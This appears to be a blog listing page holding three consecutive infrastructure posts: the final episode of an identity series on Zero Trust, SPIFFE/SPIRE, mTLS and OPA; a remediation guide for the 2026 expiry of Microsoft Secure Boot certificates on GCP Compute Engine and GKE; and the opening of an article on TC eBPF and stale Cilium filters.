  • SPIFFE (Secure Production Identity Framework For Everyone) defines a standard for workload identity — a SPIFFE ID is a URI like spiffe://corp.com/ns/prod/sa/payments-svc
  • SPIRE (SPIFFE Runtime Environment) issues short-lived X.509 SVIDs (SPIFFE Verifiable Identity Documents) to workloads — certificates that rotate automatically, every hour
  • mTLS (mutual TLS) is how workloads prove identity to each other — both sides present certificates; no passwords, no API keys
  • The evolution: /etc/passwd (1970) → NIS → LDAP → Kerberos → SAML → OIDC → SPIFFE/SPIRE — the problem has always been the same; the trust boundary keeps moving outward

The Big Picture: From /etc/passwd to Zero Trust

1970s  /etc/passwd              ← trust: the local machine
       One machine, one user list

1984   NIS / Yellow Pages       ← trust: the local network
       Centralized, but cleartext, flat

1993   LDAP                     ← trust: the directory server
       Hierarchical, scalable, encrypted (eventually)

1988   Kerberos                 ← trust: the KDC
       Tickets instead of passwords, network-wide

2002   SAML                     ← trust: the IdP assertion
       Identity crosses the internet

2014   OIDC / OAuth2            ← trust: the JWT signature
       API-native, mobile-native, developer-native

2017   SPIFFE / SPIRE           ← trust: the workload certificate
       Automated identity for services, not humans

2026   Zero Trust               ← trust: nothing, verify everything
       Continuous verification, short-lived credentials,
       device posture, behavioral signals

EP01 of this series started with the chaos of per-machine /etc/passwd. This episode — EP13 — closes the loop: from that chaos to a model where identity is verified continuously, credentials expire in hours not years, and the network provides no implicit trust.


The Assumption That Zero Trust Rejects

Traditional security assumed: if you’re on the internal network, you’re trusted. A VPN user was treated as equivalent to someone at a desk in the office. A service running on the same Kubernetes node as another service was implicitly trusted.

That assumption broke in practice:

  • Compromised VPN credentials gave attackers full internal access
  • Lateral movement after initial compromise was easy — once inside, everything trusted you
  • Perimeter-based security had no visibility into east-west traffic (service-to-service)

Zero Trust inverts the model: the network provides no trust. Every access request is verified — user or service, internal or external, first request or hundredth. Trust is dynamic, contextual, and short-lived.


Human Zero Trust: Continuous Verification

For human users, Zero Trust extends OIDC and Conditional Access:

Short-lived tokens. Access tokens expire in 1 hour (OIDC standard). Refresh tokens are revocable. A user who is terminated can have their refresh tokens revoked in Entra ID — the next time their app tries to use the refresh token, it fails. The maximum blast radius of a stolen token is bounded by its lifetime.

Device posture. The device the user authenticates from is part of the identity assertion. Conditional Access can require: device is managed (Intune-enrolled), device is compliant (no malware, full-disk encryption enabled, OS patched). A valid user credential from an unmanaged device is denied.

Behavioral signals. Entra ID Identity Protection and similar systems analyze login patterns — unusual location, impossible travel (login from Mumbai, then New York 5 minutes later), unfamiliar device. High-risk sign-ins trigger step-up authentication or are blocked automatically.

Privileged Access Management (PAM). For privileged operations (production shell access, AD admin), Zero Trust adds time-bounded just-in-time access:

Request:  "I need admin access to db01.corp.com for 2 hours to investigate an incident"
Approval: Manager approves via Slack/email/ticketing system
Grant:    Temporary role assignment or password checkout from the PAM vault
Access:   User SSHes with a one-time or time-limited credential
Expire:   Credential automatically revoked after 2 hours
Audit:    Full session recording available for review

CyberArk, BeyondTrust, and HashiCorp Vault implement this model. Vault’s SSH Secrets Engine issues short-lived SSH certificates:

# Request a signed SSH certificate (valid 30 minutes)
vault ssh \
  -role=prod-admin \
  -mode=ca \
  -mount-point=ssh-client-signer \
  [email protected]

# Vault issues a certificate signed by the server's trusted CA
# sshd on db01 trusts that CA — no authorized_keys needed
# Certificate expires in 30 minutes — no cleanup required

Workload Identity: The Non-Human Problem

Services don’t have passwords they can type. A microservice calling another microservice needs to prove its identity — but you can’t give a Kubernetes pod a static API key (it’ll be in a config file, in a git repo, or in a crash dump within 6 months).

Workload identity solves this with short-lived, automatically rotated certificates — the service’s identity is its certificate, issued by a trusted CA, expiring in minutes to hours.

Traditional:                     Zero Trust:
  payments-svc → orders-svc        payments-svc → orders-svc
  Authentication: API key           Authentication: mTLS (X.509 cert)
  "Bearer sk_live_abc123"           cert: spiffe://corp.com/ns/prod/sa/payments-svc
  Rotation: manual (rarely done)    Rotation: automatic, every hour
  Revocation: change the key        Revocation: cert expires; new cert issued
  Audit: "API key was used"         Audit: "spiffe://payments-svc → spiffe://orders-svc"

SPIFFE: The Standard

SPIFFE (Secure Production Identity Framework For Everyone) defines what a workload identity looks like. The core concept is the SPIFFE ID — a URI in the format:

spiffe://<trust-domain>/<workload-path>

Examples:
  spiffe://corp.com/ns/prod/sa/payments-svc
  spiffe://corp.com/region/us-east/service/auth-api
  spiffe://corp.com/k8s/cluster-prod/namespace/payments/pod/payments-svc-abc123

The trust domain (corp.com) is the organizational boundary. The path is the workload identifier — typically encoding namespace, service account, or cluster information.

A SPIFFE ID is embedded in an SVID (SPIFFE Verifiable Identity Document) — either an X.509 certificate (X.509-SVID) or a JWT (JWT-SVID). The X.509-SVID is the standard form: the SPIFFE ID appears in the certificate’s Subject Alternative Name (SAN) field.

X.509 Certificate (SVID):
  Subject: CN=payments-svc
  SAN: URI=spiffe://corp.com/ns/prod/sa/payments-svc
  Validity: 1 hour
  Issuer: SPIRE Intermediate CA
  Signed by: corp.com trust bundle

Any service that has the corp.com trust bundle (the CA certificate chain) can verify that a certificate with spiffe://corp.com/... in the SAN was issued by the authorized CA for that trust domain.


SPIRE: The Runtime

SPIRE (SPIFFE Runtime Environment) is the reference implementation that issues SVIDs to workloads.

SPIRE Server
  ├── Node attestation: verifies the identity of the node/VM
  │   (AWS instance identity document, GCP service account, k8s node SA)
  └── Workload attestation: verifies the identity of the process
      (Kubernetes SA, Unix UID/GID, Docker container labels)
         │
         │ issues X.509 SVIDs (short-lived, auto-rotated)
         ▼
SPIRE Agent (runs on every node)
         │
         │ SPIFFE Workload API (Unix socket)
         ▼
Workload (your service)
  → gets its own certificate
  → gets the trust bundle (CA certs of trusted domains)
  → uses cert for mTLS with other services

The workload fetches its identity via the Workload API socket — no environment variables, no file mounts. The SPIRE Agent pushes new certificates before the old ones expire. Rotation is transparent to the workload.

# On a node with SPIRE Agent running:
# Fetch the SVID for the current workload
spire-agent api fetch x509 \
  -socketPath /run/spire/sockets/agent.sock

# Output shows:
# SPIFFE ID: spiffe://corp.com/ns/prod/sa/payments-svc
# Certificate: (PEM)
# Trust bundle: (PEM of issuing CA chain)
# Expires: 2026-04-27T02:00:00Z (1 hour from now)

mTLS: Both Sides Show ID

Mutual TLS (mTLS) is what makes SPIFFE useful operationally. In standard TLS, only the server presents a certificate — the client just verifies it. In mTLS, both sides present certificates. Both sides verify the other’s certificate against the trust bundle.

payments-svc → orders-svc connection:

TLS handshake:
  payments-svc presents: spiffe://corp.com/ns/prod/sa/payments-svc cert
  orders-svc presents:   spiffe://corp.com/ns/prod/sa/orders-svc cert

  Both verify:
    • cert signed by trusted CA (the corp.com SPIRE CA)
    • cert not expired
    • SPIFFE ID in SAN matches what's expected

  After handshake: encrypted channel, both sides verified
  Authorization: orders-svc checks its policy:
    "is spiffe://corp.com/ns/prod/sa/payments-svc allowed to call /api/orders?"

Service meshes (Istio, Linkerd, Consul Connect) implement mTLS transparently — the application doesn’t handle certificates; the sidecar proxy does. In Istio’s case, Citadel (now istiod) acts as the SPIFFE-compatible CA, issuing certificates to envoy sidecars. The application code doesn’t change.


Open Policy Agent: Authorization After Identity

Zero Trust separates identity from authorization. Once you know who the caller is (SPIFFE ID, OIDC token, user cert), a policy engine decides what they can do.

OPA (Open Policy Agent) is the standard for this:

# opa-policy.rego
package authz

# payments-svc can read orders; nothing else can write orders
allow {
  input.caller == "spiffe://corp.com/ns/prod/sa/payments-svc"
  input.method == "GET"
  startswith(input.path, "/api/orders")
}

default allow = false

The service checks OPA on each request: “caller=X wants to do Y to Z — allowed?” OPA evaluates the policy and returns a decision. The policy is version-controlled, tested, and deployed independently of the service.


⚠ Common Misconceptions

“Zero Trust means no trust.” Zero Trust means trust is earned dynamically through verification, not granted by network location. A verified user with a valid, compliant device and MFA is trusted — for the scope and duration of the verified session. The “zero” refers to implicit trust, not trust itself.

“SPIFFE replaces OIDC.” SPIFFE is for workload (service) identity. OIDC is for human (user) identity. They complement each other — a service has a SPIFFE identity; a user has an OIDC identity; the authorization layer accepts both.

“mTLS is complex to implement.” With a service mesh (Istio, Linkerd), mTLS is transparent — the sidecar handles it. Without a service mesh, the application needs to use the SPIFFE Workload API. The complexity is real but manageable, especially compared to the alternative of static API keys.


Framework Alignment

Domain Relevance
CISSP Domain 5: Identity and Access Management Zero Trust extends IAM to workloads (SPIFFE) and continuous verification (short-lived tokens, device posture) — it’s the current frontier of identity architecture
CISSP Domain 3: Security Architecture and Engineering The separation of identity (SPIFFE ID), authentication (mTLS), and authorization (OPA) is a clean architectural decomposition that scales to complex multi-service environments
CISSP Domain 4: Communications and Network Security mTLS encrypts and authenticates every service-to-service connection — it eliminates the assumption that east-west traffic on the internal network is safe
CISSP Domain 1: Security and Risk Management Zero Trust is a risk management posture — it accepts that perimeter breach is inevitable and limits blast radius through continuous verification and least-privilege

Key Takeaways

  • Zero Trust rejects network-based implicit trust — every request is verified regardless of source
  • Human identity: short-lived OIDC tokens, device posture checks, Conditional Access, JIT privileged access (Vault, CyberArk)
  • Workload identity: SPIFFE IDs in X.509 certificates, issued by SPIRE, rotated automatically every hour — no static API keys
  • mTLS lets services verify each other’s identity at the TLS layer — service meshes (Istio, Linkerd) implement it transparently
  • OPA handles authorization after identity is established — who you are ≠ what you can do
  • The series arc: /etc/passwd → NIS → LDAP → Kerberos → SAML → OIDC → SPIFFE/SPIRE — the problem has always been “how do you know who someone is, at scale, without trusting the network?” The answer keeps getting better.

What does identity look like at your organization — still static API keys and shared service accounts, or moving toward SPIFFE and short-lived credentials? 👇


The Identity Stack: From LDAP to Zero Trust — 13 episodes complete.

Start from EP01: What Is LDAP →

GCP Secure Boot Certificate Expiration 2026: What You Must Do Before June 24

Reading Time: 10 minutes


TL;DR

  • Three Microsoft UEFI Secure Boot certificates expire between June 24 and October 19, 2026
  • Any GCP Compute Engine instance with Secure Boot enabled, created before November 7, 2025, carries the old certs and is at risk
  • When the certs expire, instances may fail to boot after OS updates that pull in bootloaders signed only by the replacement 2023 certificates
  • GKE Shielded Nodes are affected too — node pools whose nodes haven’t been recreated since November 7, 2025 carry the old UEFI database
  • vTPM-sealed secrets, BitLocker, and Linux full disk encryption break if Secure Boot fails mid-update
  • Primary fix: recreate affected instances (post-Nov 7, 2025 instances include the updated UEFI DB automatically)
  • Emergency workaround if boot fails: temporarily disable Secure Boot, apply updates, re-enable

The Big Picture: The UEFI Secure Boot Trust Chain

  UEFI Firmware (PK — Platform Key, set by OEM/Google)
         │
         │  PK signs KEK updates
         ▼
  ┌─────────────────────────────────────────────┐
  │        KEK (Key Exchange Key Database)       │
  │  Microsoft Corporation KEK CA 2011           │ ← EXPIRING Jun 24, 2026
  │  Microsoft Corporation KEK CA 2023           │ ← Replacement (new VMs only)
  └────────────────────┬────────────────────────┘
                       │  KEK authorizes DB/DBX updates
                       ▼
  ┌─────────────────────────────────────────────┐
  │         DB (Authorized Signature Database)   │
  │  Microsoft UEFI CA 2011 ← signs Linux Shim  │ ← EXPIRING Jun 27, 2026
  │  Microsoft Windows PCA 2011 ← signs WinBoot │ ← EXPIRING Oct 19, 2026
  │  Microsoft UEFI CA 2023 ← replacement       │ ← Present on post-Nov 7 VMs
  │  Microsoft Windows PCA 2023 ← replacement   │ ← Present on post-Nov 7 VMs
  └────────┬───────────────────────┬────────────┘
           │                       │
           ▼                       ▼
   Linux Shim (shim.efi)    Windows Boot Manager
           │
           ▼
       GRUB2 / systemd-boot
           │
           ▼
       Linux Kernel

GCP Compute Engine instances with Secure Boot enabled — created before November 7, 2025 — have a UEFI signature database that includes the 2011 certificates but not the 2023 replacements. When those 2011 certificates expire, new bootloader binaries (signed exclusively by the 2023 certs) will be rejected at boot time.


What Secure Boot Actually Does — and Why Certificate Expiry Breaks Booting

Secure Boot is UEFI’s mechanism for ensuring that only cryptographically signed, trusted software runs during the boot sequence. The trust chain works like this:

  1. Platform Key (PK): Root of trust, set by the hardware manufacturer or cloud provider. Authorizes updates to the KEK.
  2. Key Exchange Key (KEK): Authorizes modifications to the DB and DBX (the forbidden signatures database). Microsoft holds one KEK slot; OEMs often hold another.
  3. DB (Signature Database): Contains the public certificates used to verify bootloaders. If a bootloader binary is signed by a cert in DB, it’s allowed to run. If not, the firmware halts.
  4. DBX (Forbidden Signatures Database): Revocation list. Bootloaders explicitly listed here are blocked even if they were once trusted.

Where expiry matters: The DB certificates don’t “enforce” anything at runtime by checking dates themselves — UEFI doesn’t do certificate revocation in real time. The problem is different and more insidious: as Linux distributions and Microsoft ship updated bootloaders, those new binaries are signed only by the 2023 replacement certificates, not the expiring 2011 ones. If your VM’s DB doesn’t contain the 2023 certs, the UEFI firmware will reject the new shim, and the system won’t boot after an OS update that upgrades the bootloader package.

On Debian/Ubuntu, shim-signed upgrades. On RHEL/CentOS Stream, shim-x64 upgrades. Either way: new binary, new signature, old DB — boot failure.


The Three Certificates Expiring in 2026

1. Microsoft Corporation KEK CA 2011 — expires June 24, 2026

Role: Authorizes updates to the DB and DBX signature databases.

When the KEK expires, firmware that enforces KEK validity may refuse to accept DB/DBX updates signed by this certificate. This means even if Google pushes an out-of-band UEFI DB update containing the 2023 certs, instances with an expired-only KEK slot may not be able to apply it cleanly.

Replacement: Microsoft Corporation KEK CA 2023


2. Microsoft Corporation UEFI CA 2011 — expires June 27, 2026

Role: Signs third-party bootloaders — specifically the Linux Shim (shim.efi).

This is the most critical cert for Linux workloads. Every major Linux distribution uses a shim bootloader as the first-stage loader in a Secure Boot chain. The shim is signed by Microsoft’s UEFI CA because Linux vendors submit their shim builds to Microsoft for signing (to ensure broad UEFI compatibility). When new shim packages are released signed only by UEFI CA 2023, any VM with only the 2011 cert in its DB will reject them.

Replacement: Microsoft UEFI CA 2023


3. Microsoft Windows Production PCA 2011 — expires October 19, 2026

Role: Signs Windows Boot Manager and other Windows boot components.

Windows instances on GCP using Secure Boot are affected by this cert. Post-expiry Windows OS updates that ship a new Boot Manager binary signed exclusively by the 2023 PCA will fail to boot on instances carrying only the 2011 cert.

Replacement: Microsoft Windows Production PCA 2023

Windows-specific signal: Event ID 1801 in the Windows System event log — “Secure Boot CA/keys need to be updated” — will appear by mid-2026 on affected instances, before actual boot failure. This is your warning window.


Why GCP Instances Are Specifically Affected

Google’s Compute Engine Shielded VMs ship with a pre-populated UEFI variable database. The content of that database is fixed at instance creation time — it’s part of the VM’s UEFI firmware image. Instances created before November 7, 2025 have a DB that contains the 2011 certs but not the 2023 replacements. Instances created on or after November 7, 2025 had the updated database backfilled.

This is not a Google-specific failure. Every cloud provider and on-premises hypervisor platform that uses Secure Boot with a pre-populated UEFI DB has the same problem. GCP is ahead of many platforms in actually documenting it.


GKE Shielded Nodes: The Operational Blind Spot

GKE’s Shielded Nodes feature enables Secure Boot on node pool VMs. Each node is a Compute Engine instance — and all the same rules apply.

The risk: Node pools whose nodes were last provisioned before November 7, 2025 carry the old UEFI database. When containerd, the OS image, or the kernel gets updated via node auto-upgrade or manual node pool upgrade, the new node VMs will carry updated certs. But nodes that haven’t been replaced since before the cutoff are sitting on the old DB.

GKE auto-upgrade helps — but only if it’s actually running and has completed at least one full node replacement cycle since November 7, 2025.

Node pools with auto-upgrade disabled, or clusters in maintenance windows that delayed upgrades, are at risk.

The trigger scenario:
1. GKE runs a node OS update in-place on an old node (not a full node replacement)
2. The update upgrades the shim package to a version signed only by UEFI CA 2023
3. Next reboot: the node fails to boot
4. The node is marked NotReady, workloads are rescheduled — but the underlying VM is stuck


Detecting Affected Resources

Compute Engine Instances

gcloud compute instances list \
  --filter="creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true" \
  --format="table(name,zone,creationTimestamp,shieldedInstanceConfig.enableSecureBoot,status)"

Sample output:

NAME               ZONE           CREATION_TIMESTAMP        ENABLE_SECURE_BOOT  STATUS
prod-api-01        us-central1-a  2024-08-15T10:22:00Z      True                RUNNING   ← at risk
prod-db-02         us-central1-b  2023-11-01T08:15:00Z      True                RUNNING   ← at risk
prod-web-03        us-central1-a  2025-12-01T14:30:00Z      True                RUNNING   ← safe (post-Nov 7)

GKE Node Pools

# List node pools with Secure Boot enabled per cluster
gcloud container clusters list --format="value(name,location)" | while read NAME LOCATION; do
  echo "=== Cluster: $NAME ($LOCATION) ==="
  gcloud container node-pools list \
    --cluster="$NAME" \
    --location="$LOCATION" \
    --filter="config.shieldedInstanceConfig.enableSecureBoot=true" \
    --format="table(name,config.shieldedInstanceConfig.enableSecureBoot,management.autoUpgrade)"
done

Then verify node creation timestamps within affected pools:

gcloud compute instances list \
  --filter="labels.goog-gke-node:* AND creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true" \
  --format="table(name,zone,creationTimestamp,labels.goog-gke-node)"

Checking the UEFI DB on a Running Instance

SSH into an affected instance and verify which certs are in the DB:

# On the instance (requires mokutil and/or efitools)
sudo mokutil --db | grep -A3 "Subject:"

Look for CN=Microsoft UEFI CA 2023 in the output. Its absence means your instance has only the 2011 certs.

On GKE nodes (where you have node shell access via a DaemonSet or node debug pod):

# Using kubectl debug for node access
kubectl debug node/NODE_NAME -it --image=ubuntu -- bash
# Then inside the debug pod:
chroot /host
mokutil --db 2>/dev/null | grep "Microsoft.*2023" || echo "2023 cert NOT present — node at risk"

Solutions

Instances created after November 7, 2025 automatically receive the updated UEFI certificate database. The simplest fix is to recreate affected instances.

For Compute Engine:

# Step 1: Create a machine image (snapshot) of the existing instance
gcloud compute machine-images create INSTANCE_NAME-backup \
  --source-instance=INSTANCE_NAME \
  --source-instance-zone=ZONE

# Step 2: Delete the old instance (after verifying backup)
gcloud compute instances delete INSTANCE_NAME --zone=ZONE

# Step 3: Create new instance from machine image
gcloud compute instances create INSTANCE_NAME \
  --source-machine-image=INSTANCE_NAME-backup \
  --zone=ZONE \
  --shielded-secure-boot \
  --shielded-vtpm \
  --shielded-integrity-monitoring

The new instance will have the post-November 7, 2025 UEFI DB.

For GKE Node Pools:

# Option A: Upgrade the node pool (triggers node recreation)
gcloud container clusters upgrade CLUSTER_NAME \
  --location=LOCATION \
  --node-pool=NODE_POOL_NAME

# Option B: Recreate the node pool entirely
gcloud container node-pools create NODE_POOL_NAME-new \
  --cluster=CLUSTER_NAME \
  --location=LOCATION \
  --shielded-secure-boot \
  --shielded-integrity-monitoring \
  [... your existing pool config ...]

# Then cordon and drain the old pool nodes
kubectl cordon NODE_NAME
kubectl drain NODE_NAME --ignore-daemonsets --delete-emptydir-data

# Finally delete the old node pool
gcloud container node-pools delete NODE_POOL_NAME \
  --cluster=CLUSTER_NAME \
  --location=LOCATION

Option 2: Disable Secure Boot Temporarily (Emergency Workaround)

If an instance has already failed to boot after an OS update, or if you need to apply bootloader updates before recreating the instance:

# Disable Secure Boot on the stopped instance
gcloud compute instances update INSTANCE_NAME \
  --zone=ZONE \
  --no-shielded-secure-boot

# Start the instance
gcloud compute instances start INSTANCE_NAME --zone=ZONE

# SSH in, apply OS updates and any pending bootloader upgrades
# (The system will boot without Secure Boot enforcement)
sudo apt-get update && sudo apt-get upgrade -y   # Debian/Ubuntu
# or
sudo dnf update -y                                # RHEL/CentOS

# Stop the instance again
gcloud compute instances stop INSTANCE_NAME --zone=ZONE

# Re-enable Secure Boot
gcloud compute instances update INSTANCE_NAME \
  --zone=ZONE \
  --shielded-secure-boot

# Start again — now boots with new bootloader binaries
gcloud compute instances start INSTANCE_NAME --zone=ZONE

Note: This workaround doesn’t add the 2023 certs to the DB. It bypasses Secure Boot enforcement temporarily. The underlying UEFI DB still only has the 2011 certs. You still need to recreate the instance to get the updated DB — this is only a bridge to keep the instance alive while you plan migration.


Option 3: Restore from Machine Image

If an instance is already in a boot failure state and the workaround above doesn’t apply:

# List available machine images
gcloud compute machine-images list

# Restore from a pre-failure machine image
gcloud compute instances create INSTANCE_NAME-restored \
  --source-machine-image=MACHINE_IMAGE_NAME \
  --zone=ZONE

Then immediately plan recreation on a post-November 7, 2025 instance.


vTPM, BitLocker, and Full Disk Encryption: The Hidden Risk

For VMs using Shielded VM features beyond just Secure Boot — specifically vTPM with sealed secrets — certificate expiry creates a more dangerous failure mode.

How vTPM sealing works:

  Boot sequence measurements → PCR registers (PCR 0–7 for UEFI, PCR 8–15 for OS)
         │
         ▼
  TPM seals secrets (FDE key, BitLocker key) to specific PCR values
         │
         ▼
  On next boot: PCR values must match for TPM to release the key
         │
         ▼
  If Secure Boot state changes (cert DB changes, Secure Boot disabled) →
  PCR values change → TPM refuses to unseal → FDE fails → disk inaccessible

What this means in practice:

  • Linux FDE (LUKS with TPM2 unsealing): If Secure Boot fails or is temporarily disabled per the workaround above, the TPM will not release the LUKS volume key. The system will drop to a recovery prompt. You need the LUKS recovery passphrase.

  • Windows BitLocker: If PCR values shift (Secure Boot disabled, cert DB changed), BitLocker enters recovery mode. The VM prompts for the BitLocker recovery key on next boot. Without it, the volume is inaccessible.

  • Windows Virtual Secure Mode: VSM uses vTPM to protect credentials. If Secure Boot state changes, VSM-protected secrets become inaccessible until re-enrollment.

Action before any changes:

# For Linux: ensure you have the LUKS recovery key
sudo cryptsetup luksDump /dev/sda3 | grep "Key Slot"

# For Windows: export BitLocker recovery key before touching Secure Boot state
# (Do this from within the running Windows instance via PowerShell)
Get-BitLockerVolume | Select-Object -ExpandProperty KeyProtector | Where-Object {$_.KeyProtectorType -eq "RecoveryPassword"}

Store recovery keys in Secret Manager, not just locally:

# Store LUKS key in GCP Secret Manager
echo -n "YOUR_RECOVERY_KEY" | gcloud secrets create luks-recovery-INSTANCE_NAME \
  --data-file=- \
  --replication-policy=automatic

⚠ Production Gotchas

1. OS update automation is the trigger, not the cert expiry date itself.
The certs don’t enforce anything at runtime. The actual failure happens when an unattended-upgrade, yum-cron, or GKE node OS update pulls in a new shim/Boot Manager binary signed only by the 2023 cert. Instances may fail to boot weeks or months before the official cert expiry date if distros ship updated bootloaders early.

2. GKE surge upgrades can mask the problem — temporarily.
During a node pool upgrade, GKE creates new nodes (with updated certs) before draining old ones. Workloads move to new nodes. The old nodes get deleted. This looks fine — until you realize some in-place operations (node taints, label changes, manual kubelet restarts) could force old nodes to reboot without triggering node replacement.

3. Disabling Secure Boot changes vTPM PCR values — plan FDE recovery before touching anything.
The temporary workaround (disable Secure Boot) will invalidate TPM-bound disk encryption. Have recovery keys ready before running --no-shielded-secure-boot.

4. Windows Event ID 1801 is an early warning — act on it.
If you see this event in your Windows Compute Engine instances before June 2026, that instance has already identified itself as carrying the old certs. Use it as your automated detection signal in Cloud Logging.

# Query Cloud Logging for Event ID 1801 across Windows instances
gcloud logging read 'resource.type="gce_instance" AND jsonPayload.EventID=1801' \
  --format="table(resource.labels.instance_id,timestamp,jsonPayload.Message)" \
  --limit=50

5. Instance templates propagate the old DB.
If you use instance templates or managed instance groups (MIGs) to create VMs, and those templates were created before November 7, 2025, new instances created from them may or may not inherit updated certs depending on how the template configures the UEFI DB. Verify by checking creation timestamp of the resulting instance, not the template.

6. Custom OS images don’t fix this.
Importing a custom image or using a custom OS does not update the UEFI certificate database. The DB is part of the VM’s UEFI firmware state, not the OS disk image. Recreating the instance is the only reliable path.


Quick Reference: Commands

Task Command
List affected Compute Engine VMs gcloud compute instances list --filter="creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true"
Check UEFI DB on a Linux VM sudo mokutil --db \| grep -E "Subject\|Not After"
Check for 2023 cert presence mokutil --db 2>/dev/null \| grep "Microsoft.*2023" \|\| echo "2023 cert absent"
Disable Secure Boot (emergency) gcloud compute instances update INSTANCE --zone=ZONE --no-shielded-secure-boot
Re-enable Secure Boot gcloud compute instances update INSTANCE --zone=ZONE --shielded-secure-boot
Find affected GKE nodes gcloud compute instances list --filter="labels.goog-gke-node:* AND creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true"
Trigger GKE node pool upgrade gcloud container clusters upgrade CLUSTER --location=LOCATION --node-pool=POOL
Store LUKS key in Secret Manager echo -n "KEY" \| gcloud secrets create NAME --data-file=-
Query Windows Event 1801 in Logging gcloud logging read 'resource.type="gce_instance" AND jsonPayload.EventID=1801'
Create machine image backup gcloud compute machine-images create BACKUP --source-instance=INSTANCE --source-instance-zone=ZONE

Framework Alignment

Framework Domain Relevance
CISSP Domain 7: Security Operations Patch management, boot integrity, incident response
CISSP Domain 3: Security Architecture Secure Boot trust chain, TPM integration, cryptographic key lifecycle
NIST CSF 2.0 ID.AM, PR.IP Asset inventory of affected VMs; integrity protection of boot chain
CIS Benchmarks CIS Google Cloud Computing Foundations Shielded VM controls, vTPM configuration
OWASP Top 10 A05: Security Misconfiguration Failure to maintain certificate currency in security-critical infrastructure

Key Takeaways

  • The expiry of three Microsoft UEFI CA certificates in 2026 creates a window where GCP VMs with Secure Boot enabled — created before November 7, 2025 — will fail to boot after pulling in new bootloader packages
  • The failure is not instantaneous on the cert expiry date. It’s triggered by the next OS update that ships a bootloader signed exclusively by the 2023 replacement certs
  • GKE Shielded Nodes are affected through the same mechanism: node VMs that haven’t been recreated since November 7, 2025 carry the old UEFI database
  • vTPM-sealed secrets (FDE, BitLocker, VSM) add a secondary failure mode if Secure Boot state is changed as part of remediation — have recovery keys before touching anything
  • Google’s recommended fix is instance recreation. The workaround (disable Secure Boot temporarily) keeps instances alive but doesn’t fix the underlying DB — treat it as a bridge, not a resolution
  • Audit now, before June 24. The command is one line. The blast radius of missing this is a production boot failure at 2 AM after a routine security patch run

What’s Next

If you’re running Shielded VMs in production, this certificate expiry is the kind of quiet deadline that fails silently — not with an alarm, but with a VM that doesn’t come back after a patch cycle. The time to audit is before your automated patching runs, not after.

If you found this useful, the linuxcent.com newsletter covers infrastructure security at this depth regularly — kernel internals, cloud platform gotchas, and the operational implications that vendor docs bury in footnotes.

Get the next deep-dive in your inbox when it publishes → [subscribe link]

TC eBPF — Pod-Level Network Policy Without iptables

Reading Time: 10 minutes

eBPF: From Kernel to Cloud, Episode 8
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF**


Architecture Overview

TC eBPF and Cilium — traffic control hook architecture showing ingress/egress packet flow with sk_buff context
The TC hook runs inside the kernel network stack — Cilium uses it for identity-based policy enforcement.

TL;DR

  • TC eBPF fires after sk_buff allocation — it has socket metadata, cgroup ID, and pod identity that XDP lacks
    (sk_buff = the kernel’s socket buffer, allocated for every packet; TC fires after this allocation, so it can read socket and process identity)
  • Direct action (DA) mode combines filter and action; the program’s return value is the packet fate
  • Multiple TC programs chain on the same hook ordered by priority — stale programs from Cilium upgrades cause silent policy conflicts
  • tc filter show dev <iface> ingress/egress is the primary inspection tool; bpftool net list shows the full node picture
  • XDP + TC is the Cilium data path: XDP for pre-stack service load balancing, TC for per-pod identity-based enforcement
  • TC can modify packet content (bpf_skb_store_bytes) — the basis for TC-based DNAT and packet mangling

TC eBPF is where Cilium implements pod-level network policy without iptables — the hook that fires after sk_buff allocation, where socket and cgroup context exist, making per-pod enforcement possible. The obvious follow-up to XDP is why Cilium doesn’t use it for everything — pod network policy, egress enforcement, the full NetworkPolicy ruleset. The answer reveals an inherent trade-off built into the Linux data path: XDP’s speed comes from running before any context exists. At the moment it fires, there is no socket, no cgroup, no way to tell which pod sent the packet. The moment you need pod identity, you need a hook that fires later — and pays for it.


A specific pod in production was experiencing intermittent TCP connection failures to an external service. Not all connections — roughly one in fifty. Kubernetes NetworkPolicy showed egress allowed for the namespace. Cilium policy status showed no violations. Running curl from inside the pod worked fine.

The application logs told a different story: connection timeouts at the 30-second mark, no SYN-ACK received. Not a DNS issue — I verified with tcpdump inside the pod namespace. SYN packets were leaving the pod network namespace. They weren’t making it onto the wire.

I ran bpftool net list on the node and saw two TC egress programs attached to that pod’s veth interface. One from the current Cilium version (installed six weeks ago). One from the previous version — from before the rolling upgrade. Two programs. Different policy epochs. The older one had a stale block rule that fired intermittently based on connection tuple patterns it was never designed to handle in the new policy model.

Without understanding TC eBPF — what programs attach where, how multiple programs interact, and how to inspect them — I would have kept chasing ghosts in the application layer.

Quick Check: Are There Stale TC Filters on Your Cluster?

The most common TC eBPF issue on production clusters — stale filters left behind by a Cilium upgrade — is a two-command check:

# SSH into a worker node, then pick any pod's veth interface:
ip link | grep lxc | head -5
# lxc8a3f21b@if7: ...
# lxc2c9d3e1@if9: ...

# Check TC filters on that interface
tc filter show dev lxc8a3f21b egress

Healthy output (one filter, one priority):

filter protocol all pref 1 bpf chain 0
filter protocol all pref 1 bpf chain 0 handle 0x1 cil_to_container direct-action not_in_hw id 44

Stale filter present (two priorities = problem):

filter protocol all pref 1 bpf chain 0
filter protocol all pref 1 bpf chain 0 handle 0x1 cil_to_container direct-action not_in_hw id 44
filter protocol all pref 2 bpf chain 0
filter protocol all pref 2 bpf chain 0 handle 0x1 old_cil_to_container direct-action not_in_hw id 17
#                  ^^^^^^ two different priorities = two programs running in sequence

Two priorities on the same hook means two programs running sequentially. If the older one has a stale DROP rule, packets are being dropped intermittently — and nothing in the application layer will tell you why.

Not running Cilium? If you’re on a non-Cilium CNI (Calico, Flannel, aws-vpc-cni), you likely won’t have TC eBPF filters on pod interfaces. Run tc filter show dev eth0 ingress on the node uplink instead to see if any TC programs are attached at the node level. An empty response is normal for non-Cilium clusters.

Why TC, Not XDP

EP07 covered XDP: fastest possible hook, fires before sk_buff, drops at line rate. If XDP is so fast, why doesn’t Cilium use it for everything?

Because XDP sees only raw packet bytes. No socket. No cgroup. No pod identity.

In Kubernetes, network policy is inherently about identity. “Allow pod A to connect to pod B on port 8080.” To enforce this, you need to know which pod a packet is coming from on egress — and which pod it’s going to on ingress. That mapping lives in the cgroup hierarchy and the socket buffer, neither of which exist at XDP time.

TC fires later in the packet lifecycle, after sk_buff is allocated and populated:

Ingress path:
